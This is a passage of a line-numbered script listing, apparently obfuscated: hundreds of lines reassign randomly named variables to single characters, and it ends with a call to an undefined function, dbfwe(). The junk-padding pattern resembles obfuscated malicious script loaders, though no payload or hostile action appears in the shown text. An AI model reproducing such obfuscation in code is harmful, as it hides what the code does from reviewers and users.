792 | mlmes = "5"; | |
793 | idfrbxk = "u"; | |
794 | idfrbxk = "g"; | |
795 | idfrbxk = "x"; | |
796 | idfrbxk = "z"; | |
797 | idfrbxk = "U"; | |
798 | idfrbxk = "Q"; | |
799 | idfrbxk = "t"; | |
800 | idfrbxk = "S"; | |
801 | idfrbxk = "k"; | |
802 | idfrbxk = "G"; | |
803 | idfrbxk = "r"; | |
804 | idfrbxk = "f"; | |
805 | idfrbxk = "r"; | |
806 | idfrbxk = "p"; | |
807 | idfrbxk = "w"; | |
808 | idfrbxk = "u"; | |
809 | idfrbxk = "N"; | |
810 | idfrbxk = "c"; | |
811 | idfrbxk = "a"; | |
812 | idfrbxk = "j"; | |
813 | idfrbxk = "i"; | |
814 | idfrbxk = "p"; | |
815 | idfrbxk = "D"; | |
816 | idfrbxk = "Q"; | |
817 | idfrbxk = "n"; | |
818 | idfrbxk = "U"; | |
819 | idfrbxk = "c"; | |
820 | idfrbxk = "Z"; | |
821 | idfrbxk = "i"; | |
822 | idfrbxk = "y"; | |
823 | idfrbxk = "A"; | |
824 | idfrbxk = "q"; | |
825 | idfrbxk = "x"; | |
826 | idfrbxk = "C"; | |
827 | idfrbxk = "k"; | |
828 | idfrbxk = "6"; | |
829 | kfgcfc = "z"; | |
830 | kfgcfc = "v"; | |
831 | kfgcfc = "G"; | |
832 | kfgcfc = "J"; | |
833 | kfgcfc = "V"; | |
834 | kfgcfc = "V"; | |
835 | kfgcfc = "B"; | |
836 | kfgcfc = "E"; | |
837 | kfgcfc = "v"; | |
838 | kfgcfc = "E"; | |
839 | kfgcfc = "y"; | |
840 | kfgcfc = "h"; | |
841 | kfgcfc = "i"; | |
842 | kfgcfc = "f"; | |
843 | kfgcfc = "K"; | |
844 | kfgcfc = "q"; | |
845 | kfgcfc = "C"; | |
846 | kfgcfc = "z"; | |
847 | kfgcfc = "W"; | |
848 | kfgcfc = "m"; | |
849 | kfgcfc = "Z"; | |
850 | kfgcfc = "X"; | |
851 | kfgcfc = "n"; | |
852 | kfgcfc = "n"; | |
853 | kfgcfc = "o"; | |
854 | kfgcfc = "y"; | |
855 | kfgcfc = "P"; | |
856 | kfgcfc = "q"; | |
857 | kfgcfc = "z"; | |
858 | kfgcfc = "Y"; | |
859 | kfgcfc = "W"; | |
860 | kfgcfc = "x"; | |
861 | kfgcfc = "O"; | |
862 | kfgcfc = "x"; | |
863 | kfgcfc = "g"; | |
864 | kfgcfc = "U"; | |
865 | kfgcfc = "j"; | |
866 | kfgcfc = "T"; | |
867 | kfgcfc = "h"; | |
868 | kfgcfc = "R"; | |
869 | kfgcfc = "d"; | |
870 | kfgcfc = "N"; | |
871 | kfgcfc = "k"; | |
872 | kfgcfc = "b"; | |
873 | kfgcfc = "u"; | |
874 | vqoaw = "L"; | |
875 | vqoaw = "l"; | |
876 | vqoaw = "S"; | |
877 | vqoaw = "K"; | |
878 | vqoaw = "Z"; | |
879 | vqoaw = "h"; | |
880 | vqoaw = "P"; | |
881 | pcvghjsuj = "d"; | |
882 | pcvghjsuj = "V"; | |
883 | pcvghjsuj = "c"; | |
884 | pcvghjsuj = "Q"; | |
885 | pcvghjsuj = "a"; | |
886 | pcvghjsuj = "p"; | |
887 | pcvghjsuj = "Y"; | |
888 | pcvghjsuj = "d"; | |
889 | pcvghjsuj = "j"; | |
890 | pcvghjsuj = "x"; | |
891 | pcvghjsuj = "p"; | |
892 | pcvghjsuj = "z"; | |
893 | pcvghjsuj = "j"; | |
894 | pcvghjsuj = "s"; | |
895 | pcvghjsuj = "s"; | |
896 | pcvghjsuj = "B"; | |
897 | pcvghjsuj = "r"; | |
898 | pcvghjsuj = "a"; | |
899 | pcvghjsuj = "L"; | |
900 | pcvghjsuj = "T"; | |
901 | pcvghjsuj = "h"; | |
902 | pcvghjsuj = "Z"; | |
903 | pcvghjsuj = "K"; | |
904 | pcvghjsuj = "L"; | |
905 | pcvghjsuj = "p"; | |
906 | pcvghjsuj = "v"; | |
907 | pcvghjsuj = "u"; | |
908 | pcvghjsuj = "X"; | |
909 | pcvghjsuj = "r"; | |
910 | pcvghjsuj = "d"; | |
911 | pcvghjsuj = "d"; | |
912 | pcvghjsuj = "y"; | |
913 | pcvghjsuj = "V"; | |
914 | pcvghjsuj = "X"; | |
915 | pcvghjsuj = "A"; | |
916 | pcvghjsuj = "B"; | |
917 | pcvghjsuj = "F"; | |
918 | pcvghjsuj = "Q"; | |
919 | pcvghjsuj = "Y"; | |
920 | pcvghjsuj = "F"; | |
921 | kkijnjor = "G"; | |
922 | kkijnjor = "V"; | |
923 | kkijnjor = "v"; | |
924 | kkijnjor = "u"; | |
925 | kkijnjor = "T"; | |
926 | kkijnjor = "d"; | |
927 | kkijnjor = "G"; | |
928 | kkijnjor = "w"; | |
929 | kkijnjor = "n"; | |
930 | kkijnjor = "N"; | |
931 | kkijnjor = "s"; | |
932 | kkijnjor = "Z"; | |
933 | kkijnjor = "Y"; | |
934 | kkijnjor = "R"; | |
935 | kkijnjor = "n"; | |
936 | jezsvjlnb = "a"; | |
937 | jezsvjlnb = "K"; | |
938 | jezsvjlnb = "V"; | |
939 | jezsvjlnb = "T"; | |
940 | jezsvjlnb = "R"; | |
941 | jezsvjlnb = "w"; | |
942 | jezsvjlnb = "c"; | |
943 | jezsvjlnb = "U"; | |
944 | jezsvjlnb = "N"; | |
945 | jezsvjlnb = "F"; | |
946 | jezsvjlnb = "u"; | |
947 | jezsvjlnb = "Y"; | |
948 | jezsvjlnb = "J"; | |
949 | jezsvjlnb = "N"; | |
950 | jezsvjlnb = "b"; | |
951 | jezsvjlnb = "y"; | |
952 | jezsvjlnb = "r"; | |
953 | anffeeeoj = "x"; | |
954 | anffeeeoj = "n"; | |
955 | anffeeeoj = "o"; | |
956 | anffeeeoj = "J"; | |
957 | anffeeeoj = "b"; | |
958 | anffeeeoj = "W"; | |
959 | anffeeeoj = "l"; | |
960 | anffeeeoj = "h"; | |
961 | anffeeeoj = "J"; | |
962 | anffeeeoj = "e"; | |
963 | anffeeeoj = "a"; | |
964 | anffeeeoj = "d"; | |
965 | anffeeeoj = "P"; | |
966 | anffeeeoj = "M"; | |
967 | anffeeeoj = "t"; | |
968 | anffeeeoj = "M"; | |
969 | anffeeeoj = "T"; | |
970 | anffeeeoj = "v"; | |
971 | anffeeeoj = "I"; | |
972 | anffeeeoj = "t"; | |
973 | anffeeeoj = "Z"; | |
974 | anffeeeoj = "a"; | |
975 | anffeeeoj = "a"; | |
976 | anffeeeoj = "s"; | |
977 | anffeeeoj = "s"; | |
978 | anffeeeoj = "Q"; | |
979 | anffeeeoj = "V"; | |
980 | anffeeeoj = "g"; | |
981 | anffeeeoj = "j"; | |
982 | anffeeeoj = "n"; | |
983 | anffeeeoj = "k"; | |
984 | anffeeeoj = "O"; | |
985 | anffeeeoj = "s"; | |
986 | anffeeeoj = "P"; | |
987 | anffeeeoj = "d"; | |
988 | anffeeeoj = "F"; | |
989 | anffeeeoj = "P"; | |
990 | anffeeeoj = "C"; | |
991 | anffeeeoj = "o"; | |
992 | anffeeeoj = "c"; | |
993 | ikvduzur = "m"; | |
994 | ikvduzur = "k"; | |
995 | ikvduzur = "x"; | |
996 | ikvduzur = "T"; | |
997 | ikvduzur = "H"; | |
998 | ikvduzur = "H"; | |
999 | ikvduzur = "S"; | |
1000 | ikvduzur = "x"; | |
1001 | ikvduzur = "u"; | |
1002 | ikvduzur = "K"; | |
1003 | ikvduzur = "L"; | |
1004 | ikvduzur = "v"; | |
1005 | ikvduzur = "b"; | |
1006 | ikvduzur = "p"; | |
1007 | ikvduzur = "P"; | |
1008 | ikvduzur = "a"; | |
1009 | ikvduzur = "G"; | |
1010 | ikvduzur = "a"; | |
1011 | ikvduzur = "G"; | |
1012 | ikvduzur = "Y"; | |
1013 | ikvduzur = "h"; | |
1014 | ikvduzur = "x"; | |
1015 | ikvduzur = "v"; | |
1016 | ikvduzur = "j"; | |
1017 | ikvduzur = "F"; | |
1018 | ikvduzur = "Z"; | |
1019 | ikvduzur = "k"; | |
1020 | ikvduzur = "m"; | |
1021 | ikvduzur = "t"; | |
1022 | ikvduzur = "G"; | |
1023 | ikvduzur = "Z"; | |
1024 | ikvduzur = "V"; | |
1025 | ikvduzur = "n"; | |
1026 | ikvduzur = "A"; | |
1027 | ikvduzur = "s"; | |
1028 | ikvduzur = "j"; | |
1029 | ikvduzur = "j"; | |
1030 | ozhtep = "c"; | |
1031 | ozhtep = "K"; | |
1032 | ozhtep = "s"; | |
1033 | ozhtep = "Q"; | |
1034 | ozhtep = "f"; | |
1035 | ozhtep = "U"; | |
1036 | ozhtep = "Z"; | |
1037 | ozhtep = "K"; | |
1038 | ozhtep = "X"; | |
1039 | ozhtep = "i"; | |
1040 | ozhtep = "g"; | |
1041 | ozhtep = "V"; | |
1042 | ozhtep = "V"; | |
1043 | ozhtep = "A"; | |
1044 | ozhtep = "l"; | |
1045 | ozhtep = "U"; | |
1046 | ozhtep = "e"; | |
1047 | ozhtep = "D"; | |
1048 | ozhtep = "x"; | |
1049 | ozhtep = "C"; | |
1050 | ozhtep = "g"; | |
1051 | ozhtep = "P"; | |
1052 | ozhtep = "G"; | |
1053 | ozhtep = "h"; | |
1054 | ozhtep = "L"; | |
1055 | ozhtep = "T"; | |
1056 | ozhtep = "i"; | |
1057 | ozhtep = "t"; | |
1058 | ozhtep = "a"; | |
1059 | ozhtep = "A"; | |
1060 | ozhtep = "Q"; | |
1061 | ozhtep = "I"; | |
1062 | ozhtep = "F"; | |
1063 | ozhtep = "j"; | |
1064 | ozhtep = "E"; | |
1065 | ozhtep = "B"; | |
1066 | ozhtep = "U"; | |
1067 | ozhtep = "c"; | |
1068 | ozhtep = "I"; | |
1069 | ozhtep = "e"; | |
1070 | bvmycytdy = "G"; | |
1071 | bvmycytdy = "n"; | |
1072 | bvmycytdy = "Q"; | |
1073 | bvmycytdy = "s"; | |
1074 | bvmycytdy = "W"; | |
1075 | bvmycytdy = "J"; | |
1076 | bvmycytdy = "e"; | |
1077 | bvmycytdy = "r"; | |
1078 | bvmycytdy = "B"; | |
1079 | bvmycytdy = "m"; | |
1080 | bvmycytdy = "F"; | |
1081 | bvmycytdy = "n"; | |
1082 | bvmycytdy = "l"; | |
1083 | bvmycytdy = "u"; | |
1084 | bvmycytdy = "h"; | |
1085 | bvmycytdy = "N"; | |
1086 | bvmycytdy = "H"; | |
1087 | bvmycytdy = "A"; | |
1088 | bvmycytdy = "g"; | |
1089 | bvmycytdy = "S"; | |
1090 | bvmycytdy = "q"; | |
1091 | bvmycytdy = "M"; | |
1092 | bvmycytdy = "j"; | |
1093 | bvmycytdy = "K"; | |
1094 | bvmycytdy = "i"; | |
1095 | bvmycytdy = "e"; | |
1096 | bvmycytdy = "W"; | |
1097 | bvmycytdy = "k"; | |
1098 | bvmycytdy = "N"; | |
1099 | bvmycytdy = "O"; | |
1100 | bvmycytdy = "Z"; | |
1101 | bvmycytdy = "L"; | |
1102 | ospjtzwd = "c"; | |
1103 | ospjtzwd = "G"; | |
1104 | ospjtzwd = "z"; | |
1105 | ospjtzwd = "Y"; | |
1106 | ospjtzwd = "P"; | |
1107 | ospjtzwd = "q"; | |
1108 | ospjtzwd = "l"; | |
1109 | ospjtzwd = "V"; | |
1110 | ospjtzwd = "a"; | |
1111 | ospjtzwd = "v"; | |
1112 | ospjtzwd = "e"; | |
1113 | ospjtzwd = "C"; | |
1114 | ospjtzwd = "V"; | |
1115 | ospjtzwd = "P"; | |
1116 | ospjtzwd = "E"; | |
1117 | ospjtzwd = "s"; | |
1118 | ospjtzwd = "G"; | |
1119 | ospjtzwd = "Y"; | |
1120 | ospjtzwd = "g"; | |
1121 | ospjtzwd = "S"; | |
1122 | ospjtzwd = "w"; | |
1123 | ospjtzwd = "C"; | |
1124 | ospjtzwd = "9"; | |
1125 | zvuqgw = "N"; | |
1126 | zvuqgw = "z"; | |
1127 | zvuqgw = "y"; | |
1128 | zvuqgw = "U"; | |
1129 | zvuqgw = "h"; | |
1130 | zvuqgw = "T"; | |
1131 | zvuqgw = "Q"; | |
1132 | zvuqgw = "r"; | |
1133 | zvuqgw = "u"; | |
1134 | zvuqgw = "w"; | |
1135 | zvuqgw = "M"; | |
1136 | zvuqgw = "W"; | |
1137 | zvuqgw = "Z"; | |
1138 | zvuqgw = "u"; | |
1139 | zvuqgw = "v"; | |
1140 | zvuqgw = "K"; | |
1141 | zvuqgw = "Q"; | |
1142 | zvuqgw = "F"; | |
1143 | zvuqgw = "z"; | |
1144 | zvuqgw = "e"; | |
1145 | zvuqgw = "G"; | |
1146 | zvuqgw = "G"; | |
1147 | zvuqgw = "P"; | |
1148 | zvuqgw = "f"; | |
1149 | zvuqgw = "p"; | |
1150 | zvuqgw = "o"; | |
1151 | zvuqgw = "B"; | |
1152 | zvuqgw = "U"; | |
1153 | zvuqgw = "Q"; | |
1154 | zvuqgw = "n"; | |
1155 | zvuqgw = "r"; | |
1156 | zvuqgw = "p"; | |
1157 | zvuqgw = "\\"; | |
1158 | mfmwutdjl = "h"; | |
1159 | mfmwutdjl = "C"; | |
1160 | mfmwutdjl = "k"; | |
1161 | mfmwutdjl = "d"; | |
1162 | mfmwutdjl = "H"; | |
1163 | mfmwutdjl = "D"; | |
1164 | mfmwutdjl = "p"; | |
1165 | mfmwutdjl = "X"; | |
1166 | mfmwutdjl = "o"; | |
1167 | mfmwutdjl = "l"; | |
1168 | mfmwutdjl = "i"; | |
1169 | mfmwutdjl = "f"; | |
1170 | mfmwutdjl = "a"; | |
1171 | mfmwutdjl = "F"; | |
1172 | mfmwutdjl = "i"; | |
1173 | mfmwutdjl = "o"; | |
1174 | mfmwutdjl = "l"; | |
1175 | mfmwutdjl = "W"; | |
1176 | mfmwutdjl = "p"; | |
1177 | mfmwutdjl = "Z"; | |
1178 | mfmwutdjl = "O"; | |
1179 | mfmwutdjl = "R"; | |
1180 | mfmwutdjl = "N"; | |
1181 | mfmwutdjl = "L"; | |
1182 | mfmwutdjl = "q"; | |
1183 | mfmwutdjl = "m"; | |
1184 | mfmwutdjl = "k"; | |
1185 | mfmwutdjl = "I"; | |
1186 | mfmwutdjl = "i"; | |
1187 | mfmwutdjl = "s"; | |
1188 | mfmwutdjl = "F"; | |
1189 | mfmwutdjl = "X"; | |
1190 | mfmwutdjl = "i"; | |
1191 | mfmwutdjl = "w"; | |
1192 | mfmwutdjl = "M"; | |
1193 | mfmwutdjl = "X"; | |
1194 | mfmwutdjl = "b"; | |
1195 | mfmwutdjl = "i"; | |
1196 | mfmwutdjl = "S"; | |
1197 | mfmwutdjl = "U"; | |
1198 | mfmwutdjl = "@"; | |
1199 | ydpgebv = "F"; | |
1200 | ydpgebv = "C"; | |
1201 | ydpgebv = "k"; | |
1202 | ydpgebv = "V"; | |
1203 | ydpgebv = "E"; | |
1204 | ydpgebv = "C"; | |
1205 | ydpgebv = "U"; | |
1206 | ydpgebv = "S"; | |
1207 | ydpgebv = "N"; | |
1208 | ydpgebv = "e"; | |
1209 | ydpgebv = "E"; | |
1210 | ydpgebv = "U"; | |
1211 | ydpgebv = "O"; | |
1212 | ydpgebv = "a"; | |
1213 | ydpgebv = "E"; | |
1214 | ydpgebv = "N"; | |
1215 | ydpgebv = "g"; | |
1216 | ydpgebv = "o"; | |
1217 | ydpgebv = "N"; | |
1218 | ydpgebv = "L"; | |
1219 | ydpgebv = "N"; | |
1220 | ydpgebv = "y"; | |
1221 | ydpgebv = "Q"; | |
1222 | ydpgebv = "Z"; | |
1223 | ydpgebv = "j"; | |
1224 | ydpgebv = "e"; | |
1225 | ydpgebv = "P"; | |
1226 | ydpgebv = "h"; | |
1227 | ydpgebv = "I"; | |
1228 | ydpgebv = "i"; | |
1229 | ydpgebv = "g"; | |
1230 | ydpgebv = "J"; | |
1231 | ydpgebv = "_"; | |
1232 | xxeabi = "P"; | |
1233 | xxeabi = "n"; | |
1234 | xxeabi = "f"; | |
1235 | xxeabi = "Q"; | |
1236 | xxeabi = "b"; | |
1237 | vmuxzj = "K"; | |
1238 | vmuxzj = "T"; | |
1239 | ymtho = "D"; | |
1240 | ymtho = "z"; | |
1241 | ymtho = "t"; | |
1242 | ymtho = "p"; | |
1243 | ymtho = "N"; | |
1244 | ymtho = "m"; | |
1245 | ymtho = "c"; | |
1246 | ymtho = "h"; | |
1247 | vegemw = "U"; | |
1248 | vegemw = "T"; | |
1249 | vegemw = "p"; | |
1250 | vegemw = "o"; | |
1251 | vegemw = "B"; | |
1252 | vegemw = "A"; | |
1253 | vegemw = "F"; | |
1254 | vegemw = "f"; | |
1255 | vegemw = "b"; | |
1256 | vegemw = "o"; | |
1257 | vegemw = "s"; | |
1258 | vegemw = "F"; | |
1259 | vegemw = "s"; | |
1260 | vegemw = "T"; | |
1261 | vegemw = "B"; | |
1262 | vegemw = "c"; | |
1263 | vegemw = "h"; | |
1264 | vegemw = "g"; | |
1265 | vegemw = "y"; | |
1266 | vegemw = "z"; | |
1267 | vegemw = "W"; | |
1268 | vegemw = "B"; | |
1269 | vegemw = "c"; | |
1270 | vegemw = "J"; | |
1271 | vegemw = "B"; | |
1272 | vegemw = "D"; | |
1273 | vegemw = "k"; | |
1274 | vegemw = "Q"; | |
1275 | vegemw = "H"; | |
1276 | vegemw = "Q"; | |
1277 | vegemw = "O"; | |
1278 | vegemw = "E"; | |
1279 | vegemw = "0"; | |
1280 | bskmn = "r"; | |
1281 | bskmn = "X"; | |
1282 | bskmn = "P"; | |
1283 | bskmn = "h"; | |
1284 | bskmn = "t"; | |
1285 | bskmn = "b"; | |
1286 | bskmn = "x"; | |
1287 | bskmn = "B"; | |
1288 | bskmn = "s"; | |
1289 | bskmn = "n"; | |
1290 | bskmn = "Y"; | |
1291 | nqqopwm = "g"; | |
1292 | nqqopwm = "X"; | |
1293 | nqqopwm = "I"; | |
1294 | nqqopwm = "d"; | |
1295 | nqqopwm = "c"; | |
1296 | nqqopwm = "S"; | |
1297 | nqqopwm = "Q"; | |
1298 | nqqopwm = "H"; | |
1299 | nqqopwm = "F"; | |
1300 | nqqopwm = "p"; | |
1301 | nqqopwm = "-"; | |
1302 | uyijdad = "V"; | |
1303 | uyijdad = "X"; | |
1304 | uyijdad = "z"; | |
1305 | uyijdad = "A"; | |
1306 | uyijdad = "e"; | |
1307 | uyijdad = "Z"; | |
1308 | uyijdad = "X"; | |
1309 | uyijdad = "g"; | |
1310 | uyijdad = "i"; | |
1311 | uyijdad = "f"; | |
1312 | uyijdad = "V"; | |
1313 | uyijdad = "Y"; | |
1314 | uyijdad = "t"; | |
1315 | uyijdad = "k"; | |
1316 | uyijdad = "l"; | |
1317 | uyijdad = "u"; | |
1318 | uyijdad = "A"; | |
1319 | uyijdad = "D"; | |
1320 | uyijdad = "S"; | |
1321 | uyijdad = "K"; | |
1322 | uyijdad = "f"; | |
1323 | uyijdad = "V"; | |
1324 | uyijdad = "L"; | |
1325 | uyijdad = "h"; | |
1326 | uyijdad = "H"; | |
1327 | uyijdad = "O"; | |
1328 | uyijdad = "i"; | |
1329 | flrrrrqvq = "n"; | |
1330 | flrrrrqvq = "V"; | |
1331 | flrrrrqvq = "G"; | |
1332 | flrrrrqvq = "a"; | |
1333 | flrrrrqvq = "s"; | |
1334 | flrrrrqvq = "i"; | |
1335 | flrrrrqvq = "k"; | |
1336 | badvpia = "V"; | |
1337 | badvpia = "q"; | |
1338 | badvpia = "i"; | |
1339 | badvpia = "W"; | |
1340 | badvpia = "g"; | |
1341 | badvpia = "W"; | |
1342 | badvpia = "h"; | |
1343 | badvpia = "u"; | |
1344 | badvpia = "w"; | |
1345 | badvpia = "e"; | |
1346 | badvpia = "L"; | |
1347 | badvpia = "E"; | |
1348 | badvpia = "I"; | |
1349 | badvpia = "r"; | |
1350 | badvpia = "N"; | |
1351 | badvpia = "n"; | |
1352 | badvpia = "D"; | |
1353 | badvpia = "m"; | |
1354 | badvpia = "y"; | |
1355 | badvpia = "G"; | |
1356 | badvpia = "l"; | |
1357 | badvpia = "z"; | |
1358 | badvpia = "E"; | |
1359 | badvpia = "d"; | |
1360 | badvpia = "Y"; | |
1361 | badvpia = "P"; | |
1362 | badvpia = "R"; | |
1363 | badvpia = "Q"; | |
1364 | badvpia = "t"; | |
1365 | badvpia = "j"; | |
1366 | badvpia = "J"; | |
1367 | badvpia = "E"; | |
1368 | badvpia = "n"; | |
1369 | badvpia = "v"; | |
1370 | badvpia = "u"; | |
1371 | badvpia = "W"; | |
1372 | badvpia = "V"; | |
1373 | badvpia = "q"; | |
1374 | badvpia = "v"; | |
1375 | badvpia = "e"; | |
1376 | badvpia = "J"; | |
1377 | badvpia = "U"; | |
1378 | badvpia = "c"; | |
1379 | badvpia = "n"; | |
1380 | badvpia = "Q"; | |
1381 | ejhkqtvdc = "H"; | |
1382 | ejhkqtvdc = "r"; | |
1383 | ejhkqtvdc = "f"; | |
1384 | ejhkqtvdc = "H"; | |
1385 | ejhkqtvdc = "i"; | |
1386 | ejhkqtvdc = "J"; | |
1387 | ejhkqtvdc = "z"; | |
1388 | ejhkqtvdc = "d"; | |
1389 | ejhkqtvdc = "k"; | |
1390 | ejhkqtvdc = "y"; | |
1391 | ejhkqtvdc = "R"; | |
1392 | ejhkqtvdc = "D"; | |
1393 | ejhkqtvdc = "h"; | |
1394 | ejhkqtvdc = "F"; | |
1395 | ejhkqtvdc = "O"; | |
1396 | ejhkqtvdc = "d"; | |
1397 | ejhkqtvdc = "2"; | |
1398 | kopvtai = "r"; | |
1399 | kopvtai = "a"; | |
1400 | kopvtai = "J"; | |
1401 | kopvtai = "D"; | |
1402 | kopvtai = "H"; | |
1403 | kopvtai = "R"; | |
1404 | kopvtai = "T"; | |
1405 | kopvtai = "X"; | |
1406 | kopvtai = "J"; | |
1407 | kopvtai = "I"; | |
1408 | kopvtai = "L"; | |
1409 | kopvtai = "i"; | |
1410 | kopvtai = "q"; | |
1411 | kopvtai = "O"; | |
1412 | kopvtai = "P"; | |
1413 | kopvtai = "Z"; | |
1414 | kopvtai = "k"; | |
1415 | kopvtai = "U"; | |
1416 | kopvtai = "Q"; | |
1417 | kopvtai = "t"; | |
1418 | kopvtai = "H"; | |
1419 | kopvtai = "M"; | |
1420 | kopvtai = "h"; | |
1421 | kopvtai = "f"; | |
1422 | kopvtai = "C"; | |
1423 | kopvtai = "f"; | |
1424 | kopvtai = "e"; | |
1425 | kopvtai = "H"; | |
1426 | kopvtai = "7"; | |
1427 | pdnembq = "h"; | |
1428 | pdnembq = "W"; | |
1429 | pdnembq = "J"; | |
1430 | pdnembq = "V"; | |
1431 | pdnembq = "G"; | |
1432 | pdnembq = "L"; | |
1433 | pdnembq = "V"; | |
1434 | pdnembq = "O"; | |
1435 | pdnembq = "o"; | |
1436 | pdnembq = "E"; | |
1437 | pdnembq = "J"; | |
1438 | pdnembq = "M"; | |
1439 | pdnembq = "S"; | |
1440 | pdnembq = "o"; | |
1441 | pdnembq = "M"; | |
1442 | pdnembq = "X"; | |
1443 | pdnembq = "l"; | |
1444 | pdnembq = "y"; | |
1445 | pdnembq = "E"; | |
1446 | pdnembq = "r"; | |
1447 | pdnembq = "A"; | |
1448 | pdnembq = "N"; | |
1449 | pdnembq = "G"; | |
1450 | pdnembq = "M"; | |
1451 | pdnembq = "n"; | |
1452 | pdnembq = "I"; | |
1453 | pdnembq = "g"; | |
1454 | pdnembq = "G"; | |
1455 | pdnembq = "d"; | |
1456 | pdnembq = "w"; | |
1457 | pdnembq = "r"; | |
1458 | pdnembq = "H"; | |
1459 | pdnembq = "e"; | |
1460 | pdnembq = "C"; | |
1461 | pdnembq = "h"; | |
1462 | pdnembq = "O"; | |
1463 | pdnembq = "b"; | |
1464 | pdnembq = "b"; | |
1465 | pdnembq = "E"; | |
1466 | pdnembq = "n"; | |
1467 | pdnembq = "x"; | |
1468 | lohszdpji = "M"; | |
1469 | lohszdpji = "i"; | |
1470 | lohszdpji = "b"; | |
1471 | lohszdpji = "M"; | |
1472 | lohszdpji = "Z"; | |
1473 | lohszdpji = "d"; | |
1474 | lohszdpji = "r"; | |
1475 | lohszdpji = "n"; | |
1476 | lohszdpji = "t"; | |
1477 | lohszdpji = "Z"; | |
1478 | lohszdpji = "G"; | |
1479 | lohszdpji = "V"; | |
1480 | lohszdpji = "c"; | |
1481 | lohszdpji = "h"; | |
1482 | lohszdpji = "e"; | |
1483 | lohszdpji = "E"; | |
1484 | lohszdpji = "x"; | |
1485 | lohszdpji = "E"; | |
1486 | lohszdpji = "F"; | |
1487 | lohszdpji = "L"; | |
1488 | lohszdpji = "W"; | |
1489 | lohszdpji = "m"; | |
1490 | lohszdpji = "m"; | |
1491 | lohszdpji = ":"; | |
1492 | vfqtvjruf = "v"; | |
1493 | vfqtvjruf = "z"; | |
1494 | vfqtvjruf = "B"; | |
1495 | vfqtvjruf = "g"; | |
1496 | vfqtvjruf = "J"; | |
1497 | vfqtvjruf = "j"; | |
1498 | vfqtvjruf = "X"; | |
1499 | vfqtvjruf = "K"; | |
1500 | vfqtvjruf = "Y"; | |
1501 | vfqtvjruf = "y"; | |
1502 | vfqtvjruf = "k"; | |
1503 | vfqtvjruf = "O"; | |
1504 | vfqtvjruf = "x"; | |
1505 | vfqtvjruf = "S"; | |
1506 | vfqtvjruf = "r"; | |
1507 | vfqtvjruf = "t"; | |
1508 | vfqtvjruf = "t"; | |
1509 | vfqtvjruf = "U"; | |
1510 | vfqtvjruf = "B"; | |
1511 | vfqtvjruf = "y"; | |
1512 | vfqtvjruf = " "; | |
1513 | lsmnde = "a"; | |
1514 | lsmnde = "a"; | |
1515 | lsmnde = "e"; | |
1516 | lsmnde = "c"; | |
1517 | lsmnde = "k"; | |
1518 | lsmnde = "j"; | |
1519 | lsmnde = "U"; | |
1520 | lsmnde = "b"; | |
1521 | lsmnde = "k"; | |
1522 | lsmnde = "R"; | |
1523 | lsmnde = "n"; | |
1524 | lsmnde = "G"; | |
1525 | lsmnde = "X"; | |
1526 | lsmnde = "G"; | |
1527 | lsmnde = "D"; | |
1528 | lsmnde = "K"; | |
1529 | lsmnde = "h"; | |
1530 | lsmnde = "H"; | |
1531 | lsmnde = "g"; | |
1532 | lsmnde = "j"; | |
1533 | lsmnde = "l"; | |
1534 | lsmnde = "c"; | |
1535 | lsmnde = "u"; | |
1536 | lsmnde = "x"; | |
1537 | lsmnde = "x"; | |
1538 | lsmnde = "w"; | |
1539 | lsmnde = "j"; | |
1540 | lsmnde = "l"; | |
1541 | lsmnde = "j"; | |
1542 | lsmnde = "F"; | |
1543 | lsmnde = "y"; | |
1544 | lsmnde = "j"; | |
1545 | lsmnde = "D"; | |
1546 | lsmnde = "f"; | |
1547 | lsmnde = "W"; | |
1548 | lsmnde = "t"; | |
1549 | lsmnde = "U"; | |
1550 | lsmnde = "z"; | |
1551 | lsmnde = "b"; | |
1552 | lsmnde = "x"; | |
1553 | lsmnde = "P"; | |
1554 | lsmnde = "H"; | |
1555 | lsmnde = "l"; | |
1556 | dbfwe ( ); |
|